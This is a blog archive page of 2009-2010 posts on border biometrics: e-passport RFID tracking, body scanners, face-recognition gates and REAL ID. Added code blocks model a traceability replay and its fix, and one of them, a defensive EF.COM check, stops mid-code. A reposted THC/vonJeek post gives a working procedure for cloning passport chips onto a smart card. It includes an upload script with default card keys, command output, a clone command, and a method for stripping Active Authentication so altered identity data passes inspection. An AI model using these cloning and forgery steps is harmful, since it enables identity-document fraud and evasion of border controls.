Posts Tagged ‘US border biometrics’

Defects in e-Passports allow real-time tracking

Jan 27th, 2010 | By Innovya follow-up | Category: News

This threat brought to you by RFID

By Dan Goodin in San Francisco, The Register

Computer scientists in Britain have uncovered weaknesses in electronic passports issued by the US, UK, and some 50 other countries that allow attackers to trace the movements of individuals as they enter or exit buildings.

The so-called traceability attack is not the only exploit of an e-passport that allows attackers to remotely track a given credential in real time without first knowing the cryptographic keys that protect it, the scientists from the University of Birmingham said. What’s more, the RFID (radio-frequency identification) chip in the passports can’t be turned off, making the threat persistent unless the holder shields the government-mandated identity document in a special pouch.

“A traceability attack does not lead to the compromise of all data on the tag, but it does pose a very real threat to the privacy of anyone that carries such a device,” the authors, Tom Chothia and Vitaliy Smirnov, wrote. “Assuming that the target carried their passport on them, an attacker could place a device in a doorway that would detect when the target entered or left a building.”

To exploit the weakness, attackers would need to observe the targeted passport as it interacted with an authorized RFID reader at a border crossing or other official location. They could then build a special device that detects the credential each time it comes into range. The scientists estimated the device could have a reach of about 20 inches.

“This would make it easy to eavesdrop on the required message from someone as they used their passport at, for instance, a customs post,” the authors wrote.

The attack works by recording the unique message sent between a particular passport and an official RFID reader and later replaying it within range of the special device. By measuring the time it takes the device to respond, attackers can determine whether the targeted passport is within range. In the case of e-passports from France, the process is even easier: electronic credentials from that country will return the error message “6A80: Incorrect parameters” if the targeted person is in range and “6300: no information given” if the person is not.

The research is only the latest to identify the risks of embedding RFID tags into passports and other identification documents. Last year, information-security expert Chris Paget demonstrated a low-cost mobile platform that surreptitiously sniffs the unique digital identifiers in US passport cards and next-generation drivers licenses. Among other things, civil liberties advocates have warned that those identifiers could be recorded at political demonstrations or other gatherings so police or private citizens could later determine whether a given individual attended.

To be sure, the practicality of traceability attacks is more limited because a targeted passport first must be observed within range of a legitimate reader. But once this hurdle is cleared – as would be relatively easy for unscrupulous government bureaucrats to do – the attack becomes a viable way to track a target.

Chothia and Smirnov of the University of Birmingham’s School of Computer Science said the security hole can be closed by standardizing error messages and “padding” response times in future e-passports. But that will do nothing to protect holders of more than 30 million passports from more than 50 countries who are vulnerable now, they said.
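The fix Chothia and Smirnov describe, uniform error codes and padded response times, is easiest to see in a small model of the chip’s authentication step. The Go program below is an added example written for this page, not code from the researchers or from any passport vendor. It models the chip’s MAC-and-nonce check, returns the two French status words quoted above, counts cryptographic operations as a stand-in for response time, and compares a chip that exits early with distinct errors against one that always does the same work and returns a single error. Keys, nonces and the message layout are constructed for the demo; a real BAC chip derives its keys from the machine-readable zone and uses 3DES-based primitives rather than HMAC-SHA256.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/sha256"
	"fmt"
)

// Tag models an e-passport chip in the authentication step the traceability
// attack abuses. Keys and nonces are constructed for this demo.
type Tag struct {
	macKey       []byte // per-passport MAC key (derived from the MRZ in real BAC)
	session      int
	currentNonce []byte // challenge the chip issued for its current session
}

// Response is the chip's answer: an ISO 7816 status word plus the number of
// cryptographic operations performed, which stands in for response time.
type Response struct {
	StatusWord uint16
	Ops        int
}

// Status words quoted in the article for French passports.
const (
	swWrongParams = 0x6A80 // "Incorrect parameters": MAC valid, nonce stale
	swNoInfo      = 0x6300 // "No information given": MAC check failed
	swOK          = 0x9000
)

// Message is the reader's authentication command: payload plus MAC.
type Message struct {
	Payload []byte
	MAC     []byte
}

func mac(key, data []byte) []byte {
	m := hmac.New(sha256.New, key)
	m.Write(data)
	return m.Sum(nil)
}

func NewTag(key []byte) *Tag {
	t := &Tag{macKey: key}
	t.NewSession()
	return t
}

// NewSession models the chip issuing a fresh challenge on every power-up, so a
// recorded message can never authenticate again; it can only produce an error.
func (t *Tag) NewSession() {
	t.session++
	sum := sha256.Sum256(append(append([]byte{}, t.macKey...), byte(t.session)))
	t.currentNonce = sum[:8]
}

// ReaderMessage is what a legitimate reader sends to tag t in its current
// session: the message the article says an eavesdropper records.
func ReaderMessage(t *Tag) Message {
	payload := append([]byte("RND.IFD|"), t.currentNonce...)
	return Message{Payload: payload, MAC: mac(t.macKey, payload)}
}

// RespondVulnerable checks the MAC first and exits early with a distinct status
// word, so both the error code and the amount of work reveal whether the key matched.
func (t *Tag) RespondVulnerable(m Message) Response {
	ops := 1
	if !hmac.Equal(mac(t.macKey, m.Payload), m.MAC) {
		return Response{swNoInfo, ops}
	}
	ops++
	if !bytes.HasSuffix(m.Payload, t.currentNonce) {
		return Response{swWrongParams, ops}
	}
	return Response{swOK, ops}
}

// RespondHardened applies the researchers' fix: always do the same work and
// return one uniform error, so every passport answers a replay identically.
func (t *Tag) RespondHardened(m Message) Response {
	macOK := hmac.Equal(mac(t.macKey, m.Payload), m.MAC)
	nonceOK := bytes.HasSuffix(m.Payload, t.currentNonce)
	if macOK && nonceOK {
		return Response{swOK, 2}
	}
	return Response{swNoInfo, 2}
}

// Distinguishable is the regression check a chip vendor would run: does a replayed
// message get a different answer from the target passport than from another one?
func Distinguishable(respond func(*Tag, Message) Response, target, other *Tag, recorded Message) bool {
	return respond(target, recorded) != respond(other, recorded)
}

func main() {
	target := NewTag([]byte("constructed-key-passport-A"))
	other := NewTag([]byte("constructed-key-passport-B"))
	recorded := ReaderMessage(target) // captured during a legitimate session
	target.NewSession()              // the chip is powered up again later
	fmt.Println("vulnerable chip traceable:", Distinguishable((*Tag).RespondVulnerable, target, other, recorded))
	fmt.Println("hardened chip traceable:  ", Distinguishable((*Tag).RespondHardened, target, other, recorded))
}
```

Run it with go run; the vulnerable chip answers the replay with 6A80 after two operations while another passport answers 6300 after one, so the two are distinguishable, whereas the hardened chip returns 6300 after two operations in both cases. Real response-time padding needs a fixed worst-case delay rather than an operation count, and the uniform error must cover every failure path, including the ones the article does not name.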

And that’s sure to fuel criticism of RFID-enabled identification.

“This is a great example of why e-passports are a bad idea,” Paget wrote in an email to The Register. “It’s simply too expensive to replace vulnerable documents (especially when they have a 10-year lifespan) in response to legitimate security concerns, regardless of their severity. People will continue to poke holes in e-passports; without a mechanism to fix those problems there’s a strong argument that we’re better off without the RFID.”



Jill Schensul: Whole Body Scandal (“TSA Porn”)

Jan 26th, 2010 | By Innovya follow-up | Category: Articles

Should our body be considered a form of property to government?

Biometrics and security should enhance, rather than conflict with, individual privacy and dignity. As the philosopher Immanuel Kant (1724-1804) put it: “Human beings should never be treated as merely means to an end” – namely, human beings are already the purpose and must not be sacrificed to fulfil other purposes.

By: JILL SCHENSUL – TRAVEL COLUMNIST

E-mail: schensul@northjersey.com

OK, let’s calm down for a second. I think it’s time to put this issue on whole body scanning — aka “TSA porn” — in perspective.

Yes, these scanners can put together a good idea of what’s underneath our traveling clothes. That’s the point, after all, when looking for concealed weapons. But some privacy groups, passengers and elected officials watching out for our modesty think the results are a little too creepily lifelike. As Rep. Jason Chaffetz, R-Utah, coiner of the TSA porn epithet, said: “Nobody needs to see my wife and kids naked to secure an airplane.”

The scans don’t exactly look like naked people. More like naked … avatars.

The TSA also says the machines have a program that blurs faces/identities. And they point out, on the Web page of information about the machines, that the scanner “does not store, print, transmit or save the image. All machines have zero storage capability and all images are automatically deleted from the system after they are reviewed by the remotely located security officer.” It’s not like you’ll be seeing yourself on some scangallery.com site in the future, or finding your head cloned onto some X-rated body.

Probably not, anyway.

An Internet watchdog group, the Electronic Privacy Information Center [EPIC], has obtained documents from the Department of Homeland Security suggesting that the TSA wasn’t being transparent about what the machines can do; apparently, there’s a “test mode” that does allow for data storage and the export of images. Only employees with high-level clearance can access this particular mode, though, and certainly those folks are too busy poring over lists of terrorists and the like to be unleashing such unflattering images upon cyberspace.

‘Virtual strip search’

No matter what their ultimate fate, even subjecting travelers to these scans is an egregious invasion of privacy — tantamount, according to the American Civil Liberties Union, to a “virtual strip search.”

Hello? When was the last time these protesters went through a security check?

Invasion of privacy is what it’s all about. A veritable humiliation, violation marathon, from shoe removal to pocket-emptying, from undoing belts to declaring underwire bras, from swabbing our laptops to disassembling our carry-ons and pawing through purses. And the ultimate de-privatization – usually reserved for the beep-producers – is to be ordered into wanding position, to stand in that Leonardo DaVinci arms-and-legs-spread mode and be subjected to hand scanning and hand-goosings that somehow seem to suck all the freedom out of your soul.

All done before an audience of your peers. Who get to watch the belts come off and the beer bellies bared and the plumber-butts revealed as the beltless pants begin sagging. All in all, I’ll take the scanner.

The more worrisome aspect of these new machines, to me, is the radiation issue. I just keep thinking of those rolls of fogged film I’d get back from the labs every so often. The long strip of nothing but eerie billows of gray, the fallout of overradiation.

So when the TSA tells us the new scanners’ X-rays are harmless, I think about the little sign they used to have at the security screening area, way back when, that assured us X-rays would not harm film up to 400 ASA. And I think about all that gray.

The TSA already has 40 whole body scanners at airports around the country, and, since the recent close call on Northwest Airlines Flight 253, has decided to buy and deploy nearly 450 more.

There are actually two types of scanners being tested. Experts in the field of radiation seem in agreement that millimeter wave technology, which uses radio frequency energy for scanning, is harmless.

Opinions vary on the safety of the backscatter machines, which use low-level X-rays. The dose of radiation is small – about 0.1 microrem of radiation, compared with 100 microrem for a chest X-ray or 10,000 microrem for a CT scan.

According to TSA officials, backscatter machines produce a clearer image.

Radiation danger?

In an article on the American College of Radiology’s Web site, Mayo Clinic neuroradiologist Peter Kalina questions the use of even small doses of ionizing radiation in non-medical applications. “The amount of radiation may be extremely small and safe, but parents have to grasp that their 4-year-old child is being subjected to radiation. Some parents will be concerned,” he says.

David J. Brenner, a Columbia University professor of radiation oncology and public health, worries about subjecting pregnant women to the scans, too. He also says that about 5 percent of the general population is radiosensitive, among them women who carry certain breast cancer genes.

The TSA says these scans will be voluntary – you can opt for the pat-down if you want.

Kalina is concerned about a potential scenario in which a less-developed nation might adopt backscatter scanning technology, but fail to keep its scanners calibrated. “As a traveler,” he has said, “I don’t know who’s checked that machine or equipment. Can I be sure there won’t be a larger dose of radiation coming from it?” I believe he said this before the recent discovery that 206 patients at Cedars-Sinai Medical Center in Los Angeles received eight times the normal dose of radiation from a CT scan machine with a computer-resetting error.

Risk-benefit analysis

But all these debates are secondary to the real question: Are the benefits worth the risks, hassle, humiliation and expense?

The new scanners might do a better job than the current technology but obviously have their drawbacks, and opinions vary on whether they can reliably detect weapons hidden in body cavities. And they’re simply an option – not even a terrorist can be forced into one.

The scanners are a good straw to grasp at after the latest high-profile oops in the security system was brought to light.

The problem is, every new measure is simply a reaction to the latest near-miss, a Band-Aid rather than a real systemic change for the better. Various tech companies that make the equipment will certainly benefit in the short term, but will the cost and the risks really benefit the war on terrorism and make us safer?

I’m with Bruce Schneier, an internationally recognized security technologist who said that while whole-body-imaging technology “works pretty well,” the financial investment is a mistake. He believes money would be better spent on intelligence-gathering and investigations.

“It’s stupid to spend money so terrorists can change plans,” he said by phone from Poland, where he was speaking at a conference. If terrorists are swayed from going through airports, they’ll just target other locations, such as a hotel in Mumbai, India, he said.

But the orders are already in for another 100 of these machines. So, well, we’ll deal with it. I’m going to opt for the whole scan thing, especially if I don’t have to take off my shoes. And the new option should at least cut down on the incidence of plumber butt.

But technology is just one link in the security system.

And as the recent incident shows, no matter how much intelligence we gather, no matter how many alert systems we put in place, they’re useless if ignored.



Airport face scanners ‘cannot tell the difference between Osama bin Laden and Winona Ryder’

Jan 16th, 2010 | By Innovya follow-up | Category: News

By Duncan Gardham, Security Correspondent

Osama bin Laden and Winona Ryder: airport face scanners reportedly cannot tell the difference Photo: GETTY; EPA


In a leaked memo, an official says the machines have been recalibrated to an “unacceptable” level meaning travellers whose faces are shown to have only a 30% (Thirty per cent) likeness to their passport photographs can pass through.

The machines, undergoing trials at Manchester airport, have apparently been questioning so many passengers’ identities that they were creating huge queues.

The technology was designed to help immigration officials spot people traveling under false passports, particularly terrorists, but the multi-million pound scheme now appears to be in jeopardy.

In the email, the official says: “Update on the calibration – the facial recognition booths are letting passengers through at 30%.

“Changes appear to have been made without any explanation [or] giving anyone a reason for the machines [creating] what is in effect a 70% error rate.

“[The fact that] the machines do not operate at 100% is unacceptable. In addition it would be interesting to know why the acceptance level has been allowed to decrease.”

Rob Jenkins, an expert in facial recognition at Glasgow University’s psychology department, said lowering the match level to 30 per cent would make the system almost worthless.

Using facial recognition software from Sydney airport in Australia set at 30 per cent, he found the machines could not tell the difference between Osama bin Laden and the actors Kevin Spacey or even the actress Winona Ryder while Gordon Brown was indistinguishable from Mel Gibson.

Announcing a trial of five of the devices at Manchester airport last August, Jacqui Smith, the Home Secretary, said they would improve security by making it more difficult for terrorists using false passports.

At the moment the technology is only being used on British and European travelers on “high risk” flights but it is planned to extend the technology to almost all non-European Union citizens by the end of 2010.

Patrick Mercer, chairman of the House of Commons subcommittee on counter-terrorism, said he would be asking the UK Borders agency about the warnings.

The Home Office said: “We can categorically confirm that the gates are making the same high level of checks on the British and European passengers using them as they were when the trials began in August last year.

“Previous tests show that the system can reliably pick out imposters and even distinguish between identical twins. An immigration officer supervises the whole process and will intervene where necessary.”



‘Israelification’ of airports: High security, little bother

Jan 4th, 2010 | By Innovya follow-up | Category: Opinions


http://www.thestar.com/news/world/article/744199—israelification-high-security-little-bother
The ‘Israelification’ of airports: High security, little bother
Cathal Kelly, Staff Reporter

Voyeurism Security

While North America’s airports groan under the weight of another sea-change in security protocols, one word keeps popping out of the mouths of experts: Israelification.

That is, how can we make our airports more like Israel’s, which deal with a far greater terror threat with far less inconvenience?

“It is mindboggling for us Israelis to look at what happens in North America, because we went through this 50 years ago,” said Rafi Sela, the president of AR Challenges, a global transportation security consultancy. He’s worked with the RCMP, the U.S. Navy Seals and airports around the world.

“Israelis, unlike Canadians and Americans, don’t take s— from anybody. When the security agency in Israel (the ISA) started to tighten security and we had to wait in line for — not for hours — but 30 or 40 minutes, all hell broke loose here. We said, ‘We’re not going to do this. You’re going to find a way that will take care of security without touching the efficiency of the airport.’”

That, in a nutshell, is “Israelification” – a system that protects life and limb without annoying you to death.

Despite facing dozens of potential threats each day, the security set-up at Israel’s largest hub, Tel Aviv’s Ben Gurion Airport, has not been breached since 2002, when a passenger mistakenly carried a handgun onto a flight. How do they manage that?

“The first thing you do is to look at who is coming into your airport,” said Sela.

The first layer of actual security that greets travellers at Tel Aviv’s Ben Gurion International Airport is a roadside check. All drivers are stopped and asked two questions: How are you? Where are you coming from?

“Two benign questions. The questions aren’t important. The way people act when they answer them is,” Sela said.

Officers are looking for nervousness or other signs of “distress” — behavioural profiling. Sela rejects the argument that profiling is discriminatory.

“The word ‘profiling’ is a political invention by people who don’t want to do security,” he said. “To us, it doesn’t matter if he’s black, white, young or old. It’s just his behaviour. So what kind of privacy am I really stepping on when I’m doing this?”

Once you’ve parked your car or gotten off your bus, you pass through the second and third security perimeters.

Armed guards outside the terminal are trained to observe passengers as they move toward the doors, again looking for odd behaviour. At Ben Gurion’s half-dozen entrances, another layer of security is watching. At this point, some travellers will be randomly taken aside, and their person and their luggage run through a magnetometer.

“This is to see that you don’t have heavy metals on you or something that looks suspicious,” said Sela.
You are now in the terminal. As you approach your airline check-in desk, a trained interviewer takes your passport and ticket. They ask a series of questions: Who packed your luggage? Has it left your side?

“The whole time, they are looking into your eyes — which is very embarrassing. But this is one of the ways they figure out if you are suspicious or not. It takes 20, 25 seconds,” said Sela.

Lines are staggered. People are not allowed to bunch up into inviting targets for a bomber who has gotten this far.

At the check-in desk, your luggage is scanned immediately in a purpose-built area. Sela plays devil’s advocate — what if you have escaped the attention of the first four layers of security, and now try to pass a bag with a bomb in it?

“I once put this question to Jacques Duchesneau (the former head of the Canadian Air Transport Security Authority): say there is a bag with play-doh in it and two pens stuck in the play-doh. That is ‘Bombs 101’ to a screener. I asked Duchesneau, ‘What would you do?’ And he said, ‘Evacuate the terminal.’ And I said, ‘Oh. My. God.’

“Take Pearson. Do you know how many people are in the terminal at all times? Many thousands. Let’s say I’m (doing an evacuation) without panic — which will never happen. But let’s say this is the case. How long will it take? Nobody thought about it. I said, ‘Two days.’”

A screener at Ben-Gurion has a pair of better options.
First, the screening area is surrounded by contoured, blast-proof glass that can contain the detonation of up to 100 kilos of plastic explosive. Only the few dozen people within the screening area need be removed, and only to a point a few metres away.

Second, all the screening areas contain ‘bomb boxes’. If a screener spots a suspect bag, he/she is trained to pick it up and place it in the box, which is blast proof. A bomb squad arrives shortly and wheels the box away for further investigation.

“This is a very small simple example of how we can simply stop a problem that would cripple one of your airports,” Sela said.

Five security layers down: you now finally arrive at the only one which Ben-Gurion Airport shares with Pearson — the body and hand-luggage check.

“But here it is done completely, absolutely 180 degrees differently than it is done in North America,” Sela said.
“First, it’s fast — there’s almost no line. That’s because they’re not looking for liquids, they’re not looking at your shoes. They’re not looking for everything they look for in North America. They just look at you,” said Sela. 

“Even today with the heightened security in North America, they will check your items to death. But they will never look at you, at how you behave. They will never look into your eyes … and that’s how you figure out the bad guys from the good guys.”

That’s the process — six layers, four hard, two soft. The goal at Ben-Gurion is to move fliers from the parking lot to the airport lounge in a maximum of 25 minutes.
This doesn’t begin to cover the off-site security net that failed so spectacularly in targeting would-be Flight 253 bomber Umar Farouk Abdulmutallab — intelligence. In Israel, Sela said, a coordinated intelligence gathering operation produces a constantly evolving series of threat analyses and vulnerability studies. 

“There is absolutely no intelligence and threat analysis done in Canada or the United States,” Sela said. “Absolutely none.”

But even without the intelligence, Sela maintains, Abdulmutallab would not have gotten past Ben Gurion Airport’s behavioural profilers.

So. Eight years after 9/11, why are we still so reactive, so un-Israelified?

Working hard to dampen his outrage, Sela first blames our leaders, and then ourselves.

“We have a saying in Hebrew that it’s much easier to look for a lost key under the light, than to look for the key where you actually lost it, because it’s dark over there. That’s exactly how (North American airport security officials) act,” Sela said. “You can easily do what we do. You don’t have to replace anything. You have to add just a little bit — technology, training. But you have to completely change the way you go about doing airport security. And that is something that the bureaucrats have a problem with. They are very well enclosed in their own concept.”

And rather than fear, he suggests that outrage would be a far more powerful spur to provoking that change.

“Do you know why Israelis are so calm? We have brutal terror attacks on our civilians and still, life in Israel is pretty good. The reason is that people trust their defence forces, their police, their response teams and the security agencies.

They know they’re doing a good job. You can’t say the same thing about Americans and Canadians. They don’t trust anybody,” Sela said. “But they say, ‘So far, so good …’ Then if something happens, all hell breaks loose and you’ve spent eight hours in an airport. Which is ridiculous. Not justifiable.

“But, what can you do? Americans and Canadians are nice people and they will do anything because they were told to do so and because they don’t know any different.”



Fliers all for whole body scanners in airports, if it means better flight safety

Jan 3rd, 2010 | By Innovya follow-up | Category: News

BY HENRICK KAROLISZYN AND SAMUEL GOLDSMITH
DAILY NEWS WRITERS

Originally Published: Sunday, December 27th 2009, 11:11 PM
Updated: Tuesday, December 29th 2009, 1:25 PM

Some fliers say whole body scanners, which cost about $150,000 apiece, are no more invasive than a security patdown procedure.

Read more: http://www.nydailynews.com/news/national/2009/12/28/2009-12-28_fliers_favor_naked_truth_in_airport_body_scanners.html#ixzz0bZ5vDqKK

Bring on the body scans!

Beleaguered airline passengers said Sunday they have no problem with controversial new “whole body scan” machines that give screeners an undressed view of travelers.

The technology is in use at a handful of U.S. airports, including Salt Lake City and Los Angeles International, and is still being tested by the Transportation Security Administration.

“I don’t mind [the scanner] because it would be in place for safety,” said Samantha Day, 44, who flew into Kennedy Airport from London.

“It’s no more invasive than someone touching every part of your body” during existing patdown security procedures, added Marni Blitz of Robbinsville, N.J.

Opponents argue the machines violate personal privacy because they show images of the naked body. Advocates counter that they’re vital to safety – and would have detected the explosives sewn into the underwear of a Nigerian man who tried to blow up a flight over Detroit on Christmas Day.

The body imaging machines cost about $150,000. They emit some radiation, but experts say it’s far less than what passengers are exposed to on a normal flight.

Former Homeland Security chief Michael Chertoff told the Daily News that naysayers have delayed installation of the scanners.

He said the botched attack on Flight 253 shows that they are a needed weapon in the anti-terror arsenal.

“Privacy advocates and the ACLU have slowed or stopped the deployment of the machines with a barrage of objections,” Chertoff said in an e-mail. “The bad guys have figured out this vulnerability. Isn’t it time we deployed these machines?”




Letter: By December 31, 2009 – Citizens will not be able to use their driver’s licenses as identification to board commercial aircraft

Dec 14th, 2009 | By Innovya follow-up | Category: Evidence

Letter


November 18, 2009

The Honorable Nancy Pelosi
Speaker
U.S. House of Representatives
Washington, DC  20515

The Honorable Harry Reid
Majority Leader
United States Senate
Washington, DC  20510

The Honorable John Boehner
Minority Leader
U.S. House of Representatives
Washington, DC  20515

The Honorable Mitch McConnell
Minority Leader
United States Senate
Washington, DC  20510

Dear Speaker Pelosi, Senator Reid, Senator McConnell, and Representative Boehner:

By December 31, 2009, states must be materially compliant with the REAL ID Act of 2005 (REAL ID) or their citizens will not be able to use their driver’s licenses as identification to board commercial aircraft.  Based on a survey of our states, we believe that as many as 36 states will not meet the requirements of REAL ID by the end of the year.  To avoid this disruption to our citizens, especially during the holiday travel period, Congress must pass S. 1261, the “Providing for Additional Security in States’ Identification Act” (PASS ID), this year.

Since REAL ID was enacted, states have maintained that its timelines and requirements are unrealistic and constitute a huge unfunded mandate with costs far outpacing federal funding.  For these reasons, and as a result of privacy concerns, 13 states have enacted legislation prohibiting full compliance with the requirements of REAL ID, and several others have passed anti-REAL ID resolutions or have similar legislation pending. Without state participation, REAL ID falls far short of its promises, and the uncertainty of its future leaves us less secure.

PASS ID offers better, more secure and less costly standards for driver’s licenses than REAL ID.  It would alter REAL ID to allow state innovation in meeting security requirements and reduce costs by eliminating unnecessary requirements that do not increase the security and integrity of driver’s licenses and identification cards.  It also addresses privacy concerns by protecting individuals’ personal information and takes the first step toward covering the cost of compliance by authorizing funds for all states to implement the law.

The Senate Homeland Security and Governmental Affairs Committee unanimously approved S. 1261 in July.  The bill enjoys bipartisan support and the endorsement of the Secretary of the U.S. Department of Homeland Security as a practical solution that builds on the strengths of REAL ID, fixes its weaknesses and represents the best way to fulfill an important recommendation of the 9/11 Commission.

Our citizens should not be punished for the failures of REAL ID.  We therefore ask that you work with us to pass S. 1261 before the end of the year.

Sincerely,

Governor James H. Douglas

Governor Joe Manchin III



U.S. – Canada To Share Refugees’ Biometric Info

Nov 25th, 2009 | By Innovya follow-up | Category: Evidence

BEAT THE CHIP

BEATTHECHIP.ORG IS DEVOTED TO PRESERVING US CITIZENS FROM THE PROGRESS OF REAL ID LEGISLATIONS

WEDNESDAY, NOVEMBER 25, 2009

c/o CanWest News Washington
WASHINGTON — Seeking to enhance its efforts to crack down on fraudulent refugee claims, the Harper government on Tuesday announced it has struck a deal to share fingerprint information on asylum seekers with the United States.

Public Safety Minister Peter Van Loan made the announcement following a bilateral summit here with U.S. Homeland Security Secretary Janet Napolitano.

Under the protocol, the U.S. will join a biometric data-sharing initiative Canada had already launched last summer with the United Kingdom and Australia.

“Biometrics continue to be a powerful tool to prevent terrorists and criminals from crossing our shared border and preventing identity theft and asylum fraud,” Napolitano said at a news conference with Van Loan.

Canada’s privacy commissioner, Jennifer Stoddart, had expressed a series of concerns about the biometric data sharing when the plan was first announced in August. Stoddart’s office questioned Ottawa about the need to collect fingerprints and sought assurances the personal information gathered would not be used for secondary purposes.

“While we are still reviewing their response, on the surface of it, it appears they have addressed most of our concerns,” said Anne-Marie Hayden, a spokesperson for the privacy commissioner.

“They have advised us that under the protocol, biometric information will only be used for immigration and nationality issues. They have also told us that biometric matching information will only be one of many elements considered when assessing a file.”

The privacy commissioner’s office is still awaiting a response, however, on how Citizenship and Immigration Canada “plans to address our concerns about how refugees, a very vulnerable population, will be notified about the collection and use of their biometric information,” Hayden said.

Napolitano said the U.S. will dispatch its chief privacy officer to Ottawa in early December for discussions with Canadian officials. “As we share information, we are committed to protecting privacy and civil rights,” she said.

Immigration Minister Jason Kenney has argued biometric data sharing on refugee claimants dramatically increases the government’s ability to identify foreign nationals who try to hide their past when seeking to enter Canada.
His office says the agreement allows countries to check each other’s fingerprint databases but doesn’t give them unfettered access to the information.

“Previous trials show that biometric information sharing works,” Kenney said in a statement Tuesday. “The data sharing helps uncover details about refugee claimants such as identity, nationality, criminality, travel and immigration history, all of which can prove relevant to the claim.”

When Canada, the U.K. and Australia initially signed the agreement last summer, they sought to allay privacy concerns by agreeing no central database of fingerprints would be created.

The information-sharing pact is part of a broader government initiative to introduce biometrics into Canada’s immigration and refugee screening system — a plan that continues to raise red flags for privacy advocates.

“We have made them aware of our concerns with respect to what seems to be a general trend toward an increased collection of biometric information,” Hayden said.



How to create a backup of your own passport chip(s)

Nov 12th, 2009 | By Innovya follow-up | Category: Evidence


THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make us more secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.

Done, happy mrp0wning :) 

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.
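The weakness described in the paragraph above is that EF.COM, the unsigned index of data groups, is what a naive inspection system uses to decide which checks to run, while the signed EF.SOD already names every data group the issuer hashed. The following is an added example (not THC/vonJeek code or RFIDIOt code) of the check an inspection system should make: parse EF.COM's tag list and compare it with the data-group numbers from the SOD. The EF.COM bytes are constructed here, and `SOD_DGS` is assumed to have been extracted from the LDSSecurityObject in EF.SOD, since parsing that CMS structure is out of scope.

```python
# Added example, not THC/vonJeek code: parse EF.COM's tag list and compare it with
# the data groups that the signed EF.SOD hashes. EF.COM is unsigned, so a mismatch
# (for example the DG15 tag dropped from the list) must fail inspection.

# ICAO 9303 data-group tags as they appear in EF.COM's tag list (tag 0x5C).
DG_TAGS = {0x61: 1, 0x75: 2, 0x63: 3, 0x76: 4, 0x65: 5, 0x66: 6, 0x67: 7, 0x68: 8,
           0x69: 9, 0x6A: 10, 0x6B: 11, 0x6C: 12, 0x6D: 13, 0x6E: 14, 0x6F: 15, 0x70: 16}

def read_tlv(buf, pos=0):
    """Decode one BER-TLV at buf[pos]; returns (tag, value, next_pos)."""
    tag, pos = buf[pos], pos + 1
    if tag & 0x1F == 0x1F:                      # two-byte tag such as 0x5F01
        tag, pos = (tag << 8) | buf[pos], pos + 1
    length, pos = buf[pos], pos + 1
    if length & 0x80:                           # long form: 0x81/0x82 then length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_ef_com(data):
    """Return {'lds': str, 'unicode': str, 'dgs': [int]} from raw EF.COM bytes."""
    tag, body, _ = read_tlv(data)
    if tag != 0x60:
        raise ValueError("not an EF.COM: outer tag 0x%02X" % tag)
    out, pos = {"lds": None, "unicode": None, "dgs": []}, 0
    while pos < len(body):
        t, v, pos = read_tlv(body, pos)
        if t == 0x5F01:
            out["lds"] = v.decode("ascii")
        elif t == 0x5F36:
            out["unicode"] = v.decode("ascii")
        elif t == 0x5C:                         # one byte per data group present
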